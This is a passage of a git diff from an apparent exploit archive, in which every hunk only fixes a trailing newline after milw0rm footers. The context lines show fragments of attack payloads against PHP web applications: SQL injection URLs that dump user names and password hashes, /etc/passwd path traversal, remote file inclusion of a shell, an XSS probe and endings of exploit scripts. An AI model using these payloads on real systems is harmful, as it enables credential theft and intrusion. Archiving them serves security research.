+_______________________________________________________________________________________________________________________+ -# milw0rm.com [2008-01-30] +# milw0rm.com [2008-01-30] \ No newline at end of file diff --git a/platforms/php/webapps/5021.txt b/platforms/php/webapps/5021.txt index 2f181d41f..67d0bf421 100755 --- a/platforms/php/webapps/5021.txt +++ b/platforms/php/webapps/5021.txt @@ -22,4 +22,4 @@ vote.php?id=-1%20union%20select%20concat(user_name,0x3a,user_pass),2,3,4,5,6%20f = Greetz : CoNaN - Stack-Terrorist - Gold_M - Rachidox ------------------------------------------------------------- -# milw0rm.com [2008-01-30] +# milw0rm.com [2008-01-30] \ No newline at end of file diff --git a/platforms/php/webapps/5022.txt b/platforms/php/webapps/5022.txt index 81b669d8c..9557d249e 100755 --- a/platforms/php/webapps/5022.txt +++ b/platforms/php/webapps/5022.txt @@ -23,4 +23,4 @@ http://target/phplinks/includes/smarty.php?full_path_to_public_program=Evil_scri = Greetz : CoNaN - Stack-Terrorist - Gold_M - Rachidox ------------------------------------------------------------- -# milw0rm.com [2008-01-30] +# milw0rm.com [2008-01-30] \ No newline at end of file diff --git a/platforms/php/webapps/5026.txt b/platforms/php/webapps/5026.txt index 364fb5dfd..3808988b3 100755 --- a/platforms/php/webapps/5026.txt +++ b/platforms/php/webapps/5026.txt @@ -95,4 +95,4 @@ Credit: David Wharton -# milw0rm.com [2008-01-31] +# milw0rm.com [2008-01-31] \ No newline at end of file diff --git a/platforms/php/webapps/5027.txt b/platforms/php/webapps/5027.txt index 368ed8d5d..6857bbdde 100755 --- a/platforms/php/webapps/5027.txt +++ b/platforms/php/webapps/5027.txt @@ -9,4 +9,4 @@ exploits http://localhost/sflog/?blog=test&permalink=../../../../../../../../../../etc/passwd http://localhost/sflog/index.php?blog=test§ion=../../../../../../../../../../etc/passwd -# milw0rm.com [2008-01-31] +# milw0rm.com [2008-01-31] \ No newline at end of file diff --git a/platforms/php/webapps/5029.txt b/platforms/php/webapps/5029.txt index 0530b1cb2..f4bfedf4a 100755 --- a/platforms/php/webapps/5029.txt +++ b/platforms/php/webapps/5029.txt @@ -36,4 +36,4 @@ index.php?option=com_akogallery&Itemid=S@BUN&func=detail&id=-99999/**/union/**/s 2.5 beta AkoGallery is a fully integrated Mambo picture gallery component. -# milw0rm.com [2008-01-31] +# milw0rm.com [2008-01-31] \ No newline at end of file diff --git a/platforms/php/webapps/5030.txt b/platforms/php/webapps/5030.txt index 85bdd3651..391255d17 100755 --- a/platforms/php/webapps/5030.txt +++ b/platforms/php/webapps/5030.txt @@ -34,4 +34,4 @@ index.php?option=com_catalogshop&Itemid=S@BUN&func=detail&id=-1/**/union/**/sele 1.0 beta 1 ruff n ready Catalogshop is a simple Mambo ecommerce component. -# milw0rm.com [2008-01-31] +# milw0rm.com [2008-01-31] \ No newline at end of file diff --git a/platforms/php/webapps/5031.txt b/platforms/php/webapps/5031.txt index 56cdc97bb..bc735dbc5 100755 --- a/platforms/php/webapps/5031.txt +++ b/platforms/php/webapps/5031.txt @@ -34,4 +34,4 @@ index.php?option=com_restaurant&Itemid=S@BUN&func=detail&id=-1/**/union/**/selec 1.0 Restaurant is a fully integrated Mambo component. -# milw0rm.com [2008-01-31] +# milw0rm.com [2008-01-31] \ No newline at end of file diff --git a/platforms/php/webapps/5033.txt b/platforms/php/webapps/5033.txt index 17311d042..b77b59635 100755 --- a/platforms/php/webapps/5033.txt +++ b/platforms/php/webapps/5033.txt @@ -52,4 +52,4 @@ http://localhost/light/images/shell.php Best Regards, /Omni -# milw0rm.com [2008-02-01] +# milw0rm.com [2008-02-01] \ No newline at end of file diff --git a/platforms/php/webapps/5034.txt b/platforms/php/webapps/5034.txt index e5f50b81d..85651728a 100755 --- a/platforms/php/webapps/5034.txt +++ b/platforms/php/webapps/5034.txt @@ -37,4 +37,4 @@ added notes: Developped by NeoJoomla.]]> -# milw0rm.com [2008-02-01] +# milw0rm.com [2008-02-01] \ No newline at end of file diff --git a/platforms/php/webapps/5035.txt b/platforms/php/webapps/5035.txt index f1375c38c..298b5c096 100755 --- a/platforms/php/webapps/5035.txt +++ b/platforms/php/webapps/5035.txt @@ -68,4 +68,4 @@ There are some SQL-Injection vulnerabilites, but an attacker need an admin account and if he is in the administration-panel, a sql-injection he not need. -# milw0rm.com [2008-02-02] +# milw0rm.com [2008-02-02] \ No newline at end of file diff --git a/platforms/php/webapps/5037.txt b/platforms/php/webapps/5037.txt index fc9b6f1a7..2b98d89e2 100755 --- a/platforms/php/webapps/5037.txt +++ b/platforms/php/webapps/5037.txt @@ -30,4 +30,4 @@ this release. However, I have decided to release this vulnerability without a reply from the vendor as the Bug Tracker, and development project, seemed to be 'abandonded.' -# milw0rm.com [2008-02-02] +# milw0rm.com [2008-02-02] \ No newline at end of file diff --git a/platforms/php/webapps/5039.txt b/platforms/php/webapps/5039.txt index 1e4d02956..15b5d8c6c 100755 --- a/platforms/php/webapps/5039.txt +++ b/platforms/php/webapps/5039.txt @@ -28,4 +28,4 @@ wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user_login,0x7 # S@BUN GOOD LUCKY S@BUN ######################################################################### -# milw0rm.com [2008-02-02] +# milw0rm.com [2008-02-02] \ No newline at end of file diff --git a/platforms/php/webapps/5040.txt b/platforms/php/webapps/5040.txt index f7f0bda70..997ceda42 100755 --- a/platforms/php/webapps/5040.txt +++ b/platforms/php/webapps/5040.txt @@ -29,4 +29,4 @@ index.php?menu=showtopic&topicid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(ause # S@BUN GOOD LUCKY S@BUN ######################################################################### -# milw0rm.com [2008-02-02] +# milw0rm.com [2008-02-02] \ No newline at end of file diff --git a/platforms/php/webapps/5041.txt b/platforms/php/webapps/5041.txt index b297095a9..e01646ba4 100755 --- a/platforms/php/webapps/5041.txt +++ b/platforms/php/webapps/5041.txt @@ -52,4 +52,4 @@ Exemple to inject admin username and md5 hash password : http://website/phpshop/ >From Morocco : JIB L3EZZ WELLA K7AZZ ! -# milw0rm.com [2008-02-02] +# milw0rm.com [2008-02-02] \ No newline at end of file diff --git a/platforms/php/webapps/5042.txt b/platforms/php/webapps/5042.txt index 779f201ad..5c2784ec9 100755 --- a/platforms/php/webapps/5042.txt +++ b/platforms/php/webapps/5042.txt @@ -124,4 +124,4 @@ print " print "\n\nExploiting...\n"; Exploit(); -# milw0rm.com [2008-02-02] +# milw0rm.com [2008-02-02] \ No newline at end of file diff --git a/platforms/php/webapps/5047.txt b/platforms/php/webapps/5047.txt index 3bc7b1766..b3c005724 100755 --- a/platforms/php/webapps/5047.txt +++ b/platforms/php/webapps/5047.txt @@ -8,4 +8,4 @@ ### aNa TrYaGi ### ########################################################################################### -# milw0rm.com [2008-02-03] +# milw0rm.com [2008-02-03] \ No newline at end of file diff --git a/platforms/php/webapps/5050.pl b/platforms/php/webapps/5050.pl index de4b575b0..b17a1ff4d 100755 --- a/platforms/php/webapps/5050.pl +++ b/platforms/php/webapps/5050.pl @@ -125,4 +125,4 @@ print " print "\n\nExploiting...\n"; Exploit(); -# milw0rm.com [2008-02-03] +# milw0rm.com [2008-02-03] \ No newline at end of file diff --git a/platforms/php/webapps/5053.txt b/platforms/php/webapps/5053.txt index e93932839..4a9a400fd 100755 --- a/platforms/php/webapps/5053.txt +++ b/platforms/php/webapps/5053.txt @@ -26,4 +26,4 @@ wp-content/plugins/st_newsletter/shiftthis-preview.php?newsletter=-1/**/UNION/** # S@BUN GOOD LUCKY S@BUN ########################################################################## -# milw0rm.com [2008-02-03] +# milw0rm.com [2008-02-03] \ No newline at end of file diff --git a/platforms/php/webapps/5055.txt b/platforms/php/webapps/5055.txt index 6385967e4..f8f6bbcd8 100755 --- a/platforms/php/webapps/5055.txt +++ b/platforms/php/webapps/5055.txt @@ -21,4 +21,4 @@ # and All 7shasha Boards Members! # ############################################################################ -# milw0rm.com [2008-02-03] +# milw0rm.com [2008-02-03] \ No newline at end of file diff --git a/platforms/php/webapps/5056.txt b/platforms/php/webapps/5056.txt index 3498732a9..2a864d47f 100755 --- a/platforms/php/webapps/5056.txt +++ b/platforms/php/webapps/5056.txt @@ -16,4 +16,4 @@ thnx str0ke :) [!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!QTRinux!!aNa TrYaGi!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!] -# milw0rm.com [2008-02-04] +# milw0rm.com [2008-02-04] \ No newline at end of file diff --git a/platforms/php/webapps/5057.txt b/platforms/php/webapps/5057.txt index bef6358a4..2ea481ea1 100755 --- a/platforms/php/webapps/5057.txt +++ b/platforms/php/webapps/5057.txt @@ -127,4 +127,4 @@ Digital Security is leading IT security company in Russia, providing information Contact: research [at] dsec [dot] ru http://www.dsec.ru (in Russian) -# milw0rm.com [2008-02-04] +# milw0rm.com [2008-02-04] \ No newline at end of file diff --git a/platforms/php/webapps/5058.txt b/platforms/php/webapps/5058.txt index 6118bcb2f..154a34d1a 100755 --- a/platforms/php/webapps/5058.txt +++ b/platforms/php/webapps/5058.txt @@ -47,4 +47,4 @@ index.php?option=com_awesom&Itemid=S@BUN&task=viewlist&listid=-1/**/union/**/sel using your associate ID in order to earn comissions. -# milw0rm.com [2008-02-04] +# milw0rm.com [2008-02-04] \ No newline at end of file diff --git a/platforms/php/webapps/5059.txt b/platforms/php/webapps/5059.txt index bef47c2ac..0a4af2056 100755 --- a/platforms/php/webapps/5059.txt +++ b/platforms/php/webapps/5059.txt @@ -24,4 +24,4 @@ index.php?option=com_shambo2&Itemid=-999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2 # S@BUN GOOD LUCKY S@BUN ########################################################################## -# milw0rm.com [2008-02-04] +# milw0rm.com [2008-02-04] \ No newline at end of file diff --git a/platforms/php/webapps/5060.txt b/platforms/php/webapps/5060.txt index c677e5413..97527e388 100755 --- a/platforms/php/webapps/5060.txt +++ b/platforms/php/webapps/5060.txt @@ -49,4 +49,4 @@ Digital Security is leading IT security company in Russia, providing information Contact: research [at] dsec [dot] ru http://www.dsec.ru (in Russian) -# milw0rm.com [2008-02-04] +# milw0rm.com [2008-02-04] \ No newline at end of file diff --git a/platforms/php/webapps/5061.txt b/platforms/php/webapps/5061.txt index 5026a9926..399e5cb61 100755 --- a/platforms/php/webapps/5061.txt +++ b/platforms/php/webapps/5061.txt @@ -32,4 +32,4 @@ Yashira.org--> PescaoDeth, Garcez, Crackneo, alexhk_23 and all users of yashira Author: Trancek -# milw0rm.com [2008-02-04] +# milw0rm.com [2008-02-04] \ No newline at end of file diff --git a/platforms/php/webapps/5062.txt b/platforms/php/webapps/5062.txt index 5bc19052f..c3fef2844 100755 --- a/platforms/php/webapps/5062.txt +++ b/platforms/php/webapps/5062.txt @@ -34,4 +34,4 @@ //you_kn0w #=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=# -# milw0rm.com [2008-02-05] +# milw0rm.com [2008-02-05] \ No newline at end of file diff --git a/platforms/php/webapps/5064.txt b/platforms/php/webapps/5064.txt index c46cad6b9..ff01ec06f 100755 --- a/platforms/php/webapps/5064.txt +++ b/platforms/php/webapps/5064.txt @@ -48,4 +48,4 @@ http://[host]/accms_path/index.php?name=-1'/**/union/**/select/**/1,concat(accou __EOF__ -# milw0rm.com [2008-02-05] +# milw0rm.com [2008-02-05] \ No newline at end of file diff --git a/platforms/php/webapps/5065.txt b/platforms/php/webapps/5065.txt index 1ca2ee85c..5e18ed3a8 100755 --- a/platforms/php/webapps/5065.txt +++ b/platforms/php/webapps/5065.txt @@ -34,4 +34,4 @@ //you_kn0w #=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=# -# milw0rm.com [2008-02-05] +# milw0rm.com [2008-02-05] \ No newline at end of file diff --git a/platforms/php/webapps/5066.php b/platforms/php/webapps/5066.php index 7da29c9a6..c59dae5ec 100755 --- a/platforms/php/webapps/5066.php +++ b/platforms/php/webapps/5066.php @@ -95,4 +95,4 @@ function get_contents() { } ?> -# milw0rm.com [2008-02-05] +# milw0rm.com [2008-02-05] \ No newline at end of file diff --git a/platforms/php/webapps/5068.txt b/platforms/php/webapps/5068.txt index 15bf2914b..dc295cc66 100755 --- a/platforms/php/webapps/5068.txt +++ b/platforms/php/webapps/5068.txt @@ -59,4 +59,4 @@ Author: Trancek -# milw0rm.com [2008-02-06] +# milw0rm.com [2008-02-06] \ No newline at end of file diff --git a/platforms/php/webapps/5070.pl b/platforms/php/webapps/5070.pl index 07df48692..410eed5d0 100755 --- a/platforms/php/webapps/5070.pl +++ b/platforms/php/webapps/5070.pl @@ -149,4 +149,4 @@ if($result->as_string=~m/private\.php\?action=read&pmid=([0-9]*?)">haxx_resu exit; }; -# milw0rm.com [2008-02-06] +# milw0rm.com [2008-02-06] \ No newline at end of file diff --git a/platforms/php/webapps/5071.txt b/platforms/php/webapps/5071.txt index 5d898920e..d640ab62d 100755 --- a/platforms/php/webapps/5071.txt +++ b/platforms/php/webapps/5071.txt @@ -40,4 +40,4 @@ //you_kn0w #=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=# -# milw0rm.com [2008-02-06] +# milw0rm.com [2008-02-06] \ No newline at end of file diff --git a/platforms/php/webapps/5072.txt b/platforms/php/webapps/5072.txt index 283dfe924..b9eeac9ca 100755 --- a/platforms/php/webapps/5072.txt +++ b/platforms/php/webapps/5072.txt @@ -14,4 +14,4 @@ ### Note : Kac Kere ölDunuz ki " Olum Den Korkmuyorum Ben " Diyebiliyorsunuz . . . ########################################################################################### -# milw0rm.com [2008-02-06] +# milw0rm.com [2008-02-06] \ No newline at end of file diff --git a/platforms/php/webapps/5073.txt b/platforms/php/webapps/5073.txt index b1db543b6..28dcdbab4 100755 --- a/platforms/php/webapps/5073.txt +++ b/platforms/php/webapps/5073.txt @@ -24,4 +24,4 @@ index.php?option=com_downloads&Itemid=S@BUN&func=selectfolder&filecatid=-1/**/un # S@BUN i AM NOT HACKER S@BUN ########################################################################## -# milw0rm.com [2008-02-06] +# milw0rm.com [2008-02-06] \ No newline at end of file diff --git a/platforms/php/webapps/5074.php b/platforms/php/webapps/5074.php index a91047815..2e98b37a0 100755 --- a/platforms/php/webapps/5074.php +++ b/platforms/php/webapps/5074.php @@ -123,4 +123,4 @@ echo "---------------------------------------------------\n"; ?> -# milw0rm.com [2008-02-06] +# milw0rm.com [2008-02-06] \ No newline at end of file diff --git a/platforms/php/webapps/5075.txt b/platforms/php/webapps/5075.txt index 24b8650bf..311960626 100755 --- a/platforms/php/webapps/5075.txt +++ b/platforms/php/webapps/5075.txt @@ -23,4 +23,4 @@ http://site.com/customer_testimonials.php?testimonial_id=99999+union+select+1,2, source: http://addons.oscommerce.com/info/5477 -# milw0rm.com [2008-02-07] +# milw0rm.com [2008-02-07] \ No newline at end of file diff --git a/platforms/php/webapps/5076.txt b/platforms/php/webapps/5076.txt index e00043649..653a871c8 100755 --- a/platforms/php/webapps/5076.txt +++ b/platforms/php/webapps/5076.txt @@ -61,4 +61,4 @@ side notes: www.isaim.com 0.2 -# milw0rm.com [2008-02-07] +# milw0rm.com [2008-02-07] \ No newline at end of file diff --git a/platforms/php/webapps/5080.txt b/platforms/php/webapps/5080.txt index de0def698..51f43566c 100755 --- a/platforms/php/webapps/5080.txt +++ b/platforms/php/webapps/5080.txt @@ -26,4 +26,4 @@ index.php?option=com_doc&task=view&sid=-1/**/union/**/select/**/concat(username, # S@BUN i AM NOT HACKER S@BUN ########################################################################## -# milw0rm.com [2008-02-07] +# milw0rm.com [2008-02-07] \ No newline at end of file diff --git a/platforms/php/webapps/5081.txt b/platforms/php/webapps/5081.txt index 27f7a0a6e..dec1cb0d6 100755 --- a/platforms/php/webapps/5081.txt +++ b/platforms/php/webapps/5081.txt @@ -39,4 +39,4 @@ index.php?option=com_noticias&Itemid=xcorpitx&task=detalhe&id=-99887766/**/union Thanks my friends : Hayalet,D3NGES!Z,PC FARESi,SMOKÝN,MOSTBÝG -# milw0rm.com [2008-02-07] +# milw0rm.com [2008-02-07] \ No newline at end of file diff --git a/platforms/php/webapps/5082.txt b/platforms/php/webapps/5082.txt index 390e61857..868bd6cfe 100755 --- a/platforms/php/webapps/5082.txt +++ b/platforms/php/webapps/5082.txt @@ -85,4 +85,4 @@ Digital Security is leading IT security company in Russia, providing information Contact: research [at] dsec [dot] ru http://www.dsec.ru (in Russian) -# milw0rm.com [2008-02-08] +# milw0rm.com [2008-02-08] \ No newline at end of file diff --git a/platforms/php/webapps/5083.txt b/platforms/php/webapps/5083.txt index 68bf7b779..d2ee4bcc3 100755 --- a/platforms/php/webapps/5083.txt +++ b/platforms/php/webapps/5083.txt @@ -37,4 +37,4 @@ index.php?option=com_neogallery&task=show&Itemid=5&catid=999999%2F%2A%2A%2Funion 1.1 Realise par Nicolas Cornet - Neoweb.]]> -# milw0rm.com [2008-02-08] +# milw0rm.com [2008-02-08] \ No newline at end of file diff --git a/platforms/php/webapps/5084.txt b/platforms/php/webapps/5084.txt index 328c5ed34..c574c9835 100755 --- a/platforms/php/webapps/5084.txt +++ b/platforms/php/webapps/5084.txt @@ -28,4 +28,4 @@ index.php?option=com_gallery&Itemid=0&func=detail&id=-999999%2F%2A%2A%2Funion%2F # S@BUN i AM NOT HACKER S@BUN ########################################################################## -# milw0rm.com [2008-02-08] +# milw0rm.com [2008-02-08] \ No newline at end of file diff --git a/platforms/php/webapps/5088.py b/platforms/php/webapps/5088.py index 322978876..39f4d3329 100755 --- a/platforms/php/webapps/5088.py +++ b/platforms/php/webapps/5088.py @@ -125,4 +125,4 @@ while j <= 32: print "\n\n[+]All Done.\n-=Paradox Got This One=-" -# milw0rm.com [2008-02-09] +# milw0rm.com [2008-02-09] \ No newline at end of file diff --git a/platforms/php/webapps/5089.txt b/platforms/php/webapps/5089.txt index 10d12c327..2f89e9229 100755 --- a/platforms/php/webapps/5089.txt +++ b/platforms/php/webapps/5089.txt @@ -27,4 +27,4 @@ http://Target/[path]/aides/index.php?page=[LFI]%00 ----- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo -------- ------------------------------------------------------------- -# milw0rm.com [2008-02-09] +# milw0rm.com [2008-02-09] \ No newline at end of file diff --git a/platforms/php/webapps/5090.pl b/platforms/php/webapps/5090.pl index 7751d22e1..1112f94de 100755 --- a/platforms/php/webapps/5090.pl +++ b/platforms/php/webapps/5090.pl @@ -45,4 +45,4 @@ else die "Error: ".$response->status_line; } -# milw0rm.com [2008-02-09] +# milw0rm.com [2008-02-09] \ No newline at end of file diff --git a/platforms/php/webapps/5091.pl b/platforms/php/webapps/5091.pl index 875f40be8..59eb263ec 100755 --- a/platforms/php/webapps/5091.pl +++ b/platforms/php/webapps/5091.pl @@ -45,4 +45,4 @@ else die "Error: ".$response->status_line; } -# milw0rm.com [2008-02-09] +# milw0rm.com [2008-02-09] \ No newline at end of file diff --git a/platforms/php/webapps/5094.txt b/platforms/php/webapps/5094.txt index 57f92a201..08ed95baa 100755 --- a/platforms/php/webapps/5094.txt +++ b/platforms/php/webapps/5094.txt @@ -34,4 +34,4 @@ http://site.com/index.php?option=com_comments&task=view&id=-1+UNION+SELECT+0,999 ## This is my first exploit! ## thanks to all who came before me, and enabled me to learn from their efforts! -# milw0rm.com [2008-02-09] +# milw0rm.com [2008-02-09] \ No newline at end of file diff --git a/platforms/php/webapps/5095.txt b/platforms/php/webapps/5095.txt index 4e7364e50..4355f009a 100755 --- a/platforms/php/webapps/5095.txt +++ b/platforms/php/webapps/5095.txt @@ -21,4 +21,4 @@ example : www.target.com/path/index.php?category=%22%3E%3Cscript%3Ealert(1);%3C/ = Dork : "PKs Movie Database" -# milw0rm.com [2008-02-10] +# milw0rm.com [2008-02-10] \ No newline at end of file diff --git a/platforms/php/webapps/5096.txt b/platforms/php/webapps/5096.txt index d0004b1cd..ef3836eb9 100755 --- a/platforms/php/webapps/5096.txt +++ b/platforms/php/webapps/5096.txt @@ -21,4 +21,4 @@ # Mini.Spider,and All 7shasha Boards Members! # ############################################################################ -# milw0rm.com [2008-02-10] +# milw0rm.com [2008-02-10] \ No newline at end of file diff --git a/platforms/php/webapps/5097.txt b/platforms/php/webapps/5097.txt index e70926635..9b0b9b55e 100755 --- a/platforms/php/webapps/5097.txt +++ b/platforms/php/webapps/5097.txt @@ -12,4 +12,4 @@ eval('class perfmon_parent_EXTENDER extends ' . $last_module . '_ADOConnection { ### /vendors/adodb_lite/adodb-perf-module.inc.php?last_module=t{};%20class%20t{};include(URL-SHELL);// ### I'm TrYaGi ......:) -# milw0rm.com [2008-02-10] +# milw0rm.com [2008-02-10] \ No newline at end of file diff --git a/platforms/php/webapps/5098.txt b/platforms/php/webapps/5098.txt index 631205003..a985e9666 100755 --- a/platforms/php/webapps/5098.txt +++ b/platforms/php/webapps/5098.txt @@ -7,4 +7,4 @@ ### /includes/adodb_lite/adodb-perf-module.inc.php?last_module=t{};%20class%20t{};include(URL-SHELL);// ### I'm TrYaGi ......:) -# milw0rm.com [2008-02-10] +# milw0rm.com [2008-02-10] \ No newline at end of file diff --git a/platforms/php/webapps/5099.php b/platforms/php/webapps/5099.php index d2c4327b1..2fdc4c2f0 100755 --- a/platforms/php/webapps/5099.php +++ b/platforms/php/webapps/5099.php @@ -63,4 +63,4 @@ exit("Error:Libcurl isnt installed \n"); ?> -# milw0rm.com [2008-02-10] +# milw0rm.com [2008-02-10] \ No newline at end of file diff --git a/platforms/php/webapps/5101.pl b/platforms/php/webapps/5101.pl index 934257eba..300db347c 100755 --- a/platforms/php/webapps/5101.pl +++ b/platforms/php/webapps/5101.pl @@ -67,4 +67,4 @@ print "\n [-] Exploit gagal :( - cari yang lain!"; exit(); } -# milw0rm.com [2008-02-12] +# milw0rm.com [2008-02-12] \ No newline at end of file diff --git a/platforms/php/webapps/5103.txt b/platforms/php/webapps/5103.txt index a5c042174..076897059 100755 --- a/platforms/php/webapps/5103.txt +++ b/platforms/php/webapps/5103.txt @@ -37,4 +37,4 @@ after user_id or catogry_id add exploit www.dianthos.net 1.6.5 -# milw0rm.com [2008-02-12] +# milw0rm.com [2008-02-12] \ No newline at end of file diff --git a/platforms/php/webapps/5104.txt b/platforms/php/webapps/5104.txt index 6c587966c..19192cfd3 100755 --- a/platforms/php/webapps/5104.txt +++ b/platforms/php/webapps/5104.txt @@ -35,4 +35,4 @@ index.php?option=com_pcchess&Itemid=S@BUN&page=players&user_id=-9999999/**/union www.princeclan.org 0.8 -# milw0rm.com [2008-02-12] +# milw0rm.com [2008-02-12] \ No newline at end of file diff --git a/platforms/php/webapps/5105.pl b/platforms/php/webapps/5105.pl index 896ebfc46..55e954c9a 100755 --- a/platforms/php/webapps/5105.pl +++ b/platforms/php/webapps/5105.pl @@ -113,4 +113,4 @@ sub exploit } } -# milw0rm.com [2008-02-12] +# milw0rm.com [2008-02-12] \ No newline at end of file diff --git a/platforms/php/webapps/5108.txt b/platforms/php/webapps/5108.txt index 7ad9ffc01..ce0a38a76 100755 --- a/platforms/php/webapps/5108.txt +++ b/platforms/php/webapps/5108.txt @@ -3,4 +3,4 @@ http://kent.dl.sourceforge.net/sourceforge/affmarket/affmarket.30.03.07.zip /user/header.php?language=../../../../../../../../../../../etc/passwd I'm tryagi ..^|- -# milw0rm.com [2008-02-13] +# milw0rm.com [2008-02-13] \ No newline at end of file diff --git a/platforms/php/webapps/5109.txt b/platforms/php/webapps/5109.txt index 16b68d73a..c0d108387 100755 --- a/platforms/php/webapps/5109.txt +++ b/platforms/php/webapps/5109.txt @@ -39,4 +39,4 @@ index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=-9988%2F%2A%2A%2 1.2 XfaQ is an addon for Joomla 1.x and Mambo 4.5.x. Based on SimpleFAQ 2.0.1 from www.parkviewconsultants.com -# milw0rm.com [2008-02-13] +# milw0rm.com [2008-02-13] \ No newline at end of file diff --git a/platforms/php/webapps/5114.pl b/platforms/php/webapps/5114.pl index 653c04399..6c45a3bb5 100755 --- a/platforms/php/webapps/5114.pl +++ b/platforms/php/webapps/5114.pl @@ -125,4 +125,4 @@ print " print "\n\nExploiting...\n"; Exploit(); -# milw0rm.com [2008-02-14] +# milw0rm.com [2008-02-14] \ No newline at end of file diff --git a/platforms/php/webapps/5115.txt b/platforms/php/webapps/5115.txt index ea8a8ff80..01db73e6d 100755 --- a/platforms/php/webapps/5115.txt +++ b/platforms/php/webapps/5115.txt @@ -20,4 +20,4 @@ # Our site : Http://IRCRASH.COM # ##################################################################################### -# milw0rm.com [2008-02-14] +# milw0rm.com [2008-02-14] \ No newline at end of file diff --git a/platforms/php/webapps/5116.txt b/platforms/php/webapps/5116.txt index 766f20450..67b43edfd 100755 --- a/platforms/php/webapps/5116.txt +++ b/platforms/php/webapps/5116.txt @@ -9,4 +9,4 @@ exploits http://localhost/artmedic_weblog/index.php?ta=../../../../../../../../../../etc/passwd%00 http://localhost/artmedic_weblog/artmedic_print.php?date=../../../../../../../../../../etc/passwd%00 -# milw0rm.com [2008-02-14] +# milw0rm.com [2008-02-14] \ No newline at end of file diff --git a/platforms/php/webapps/5117.txt b/platforms/php/webapps/5117.txt index d3ba0938b..9cb7123a0 100755 --- a/platforms/php/webapps/5117.txt +++ b/platforms/php/webapps/5117.txt @@ -51,4 +51,4 @@ S@BUN&task=view&iid=-3333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2C ]]> -# milw0rm.com [2008-02-14] +# milw0rm.com [2008-02-14] \ No newline at end of file diff --git a/platforms/php/webapps/5118.txt b/platforms/php/webapps/5118.txt index 2fe3a25cf..915ff3870 100755 --- a/platforms/php/webapps/5118.txt +++ b/platforms/php/webapps/5118.txt @@ -53,4 +53,4 @@ EXPLOİT=2= ]]> -# milw0rm.com [2008-02-14] +# milw0rm.com [2008-02-14] \ No newline at end of file diff --git a/platforms/php/webapps/5119.txt b/platforms/php/webapps/5119.txt index 739e5ad46..31e6badde 100755 --- a/platforms/php/webapps/5119.txt +++ b/platforms/php/webapps/5119.txt @@ -50,4 +50,4 @@ EXPLOİT=2= 0.81 Komponent Quiz dla Joomla. Umożliwia tworzenie w kilku krokach testów/quizów oraz zarzÄ…dzanie nimi. Autor: Ioannis Sannos (DataHellas). Polska adaptacja i AdminLanguage: zwiastun@zwiastun.net -# milw0rm.com [2008-02-14] +# milw0rm.com [2008-02-14] \ No newline at end of file diff --git a/platforms/php/webapps/5120.pl b/platforms/php/webapps/5120.pl index 4ce7c8ea6..114952ddf 100755 --- a/platforms/php/webapps/5120.pl +++ b/platforms/php/webapps/5120.pl @@ -93,4 +93,4 @@ sub check_vuln } else { print "\nvulnerable..."; } } -# milw0rm.com [2008-02-14] +# milw0rm.com [2008-02-14] \ No newline at end of file diff --git a/platforms/php/webapps/5121.txt b/platforms/php/webapps/5121.txt index e5bfb73a3..966ce0de8 100755 --- a/platforms/php/webapps/5121.txt +++ b/platforms/php/webapps/5121.txt @@ -49,4 +49,4 @@ http://www.example.com/modules/class/Table.php?sys_conf[path][real]=[Evil_Code] [*]---------------------------------------------------------- -# milw0rm.com [2008-02-14] +# milw0rm.com [2008-02-14] \ No newline at end of file diff --git a/platforms/php/webapps/5123.txt b/platforms/php/webapps/5123.txt index 5034d3285..b9a71626a 100755 --- a/platforms/php/webapps/5123.txt +++ b/platforms/php/webapps/5123.txt @@ -7,4 +7,4 @@ contact muuratsalo[at]gmail.com exploit http://localhost/0.2/index.php?page=../../../../../../../../../../etc/passwd%00 -# milw0rm.com [2008-02-14] +# milw0rm.com [2008-02-14] \ No newline at end of file diff --git a/platforms/php/webapps/5124.txt b/platforms/php/webapps/5124.txt index 69a5fc8a6..cb3170607 100755 --- a/platforms/php/webapps/5124.txt +++ b/platforms/php/webapps/5124.txt @@ -33,4 +33,4 @@ we can modify the cookie lang value whit a ../../../../ etc... and give a local [*]---------------------------------------------------------- -# milw0rm.com [2008-02-14] +# milw0rm.com [2008-02-14] \ No newline at end of file diff --git a/platforms/php/webapps/5125.txt b/platforms/php/webapps/5125.txt index 1317a7f2a..173fb5c92 100755 --- a/platforms/php/webapps/5125.txt +++ b/platforms/php/webapps/5125.txt @@ -20,4 +20,4 @@ Found by Xar of h4ck-y0u Greets to Don & ViSiOn -# milw0rm.com [2008-02-14] +# milw0rm.com [2008-02-14] \ No newline at end of file diff --git a/platforms/php/webapps/5126.txt b/platforms/php/webapps/5126.txt index 9b01a6649..eae008c13 100755 --- a/platforms/php/webapps/5126.txt +++ b/platforms/php/webapps/5126.txt @@ -37,4 +37,4 @@ exploit 2 : # S@BUN i AM NOT HACKER S@BUN ################################################################ -# milw0rm.com [2008-02-15] +# milw0rm.com [2008-02-15] \ No newline at end of file diff --git a/platforms/php/webapps/5127.txt b/platforms/php/webapps/5127.txt index cf5a86383..441c762d7 100755 --- a/platforms/php/webapps/5127.txt +++ b/platforms/php/webapps/5127.txt @@ -60,4 +60,4 @@ www.xxxxx/forums?forum=1(expliot) # S@BUN i AM NOT HACKER S@BUN ################################################################ -# milw0rm.com [2008-02-15] +# milw0rm.com [2008-02-15] \ No newline at end of file diff --git a/platforms/php/webapps/5128.txt b/platforms/php/webapps/5128.txt index 05d16f3f6..650bf92cb 100755 --- a/platforms/php/webapps/5128.txt +++ b/platforms/php/webapps/5128.txt @@ -33,4 +33,4 @@ balcan-crew.org milw0rm.com h4cky0u.biz -# milw0rm.com [2008-02-15] +# milw0rm.com [2008-02-15] \ No newline at end of file diff --git a/platforms/php/webapps/5129.txt b/platforms/php/webapps/5129.txt index f910d3675..05b5c9011 100755 --- a/platforms/php/webapps/5129.txt +++ b/platforms/php/webapps/5129.txt @@ -6,4 +6,4 @@ ### Dork : TRUC 0.11.0 :: © 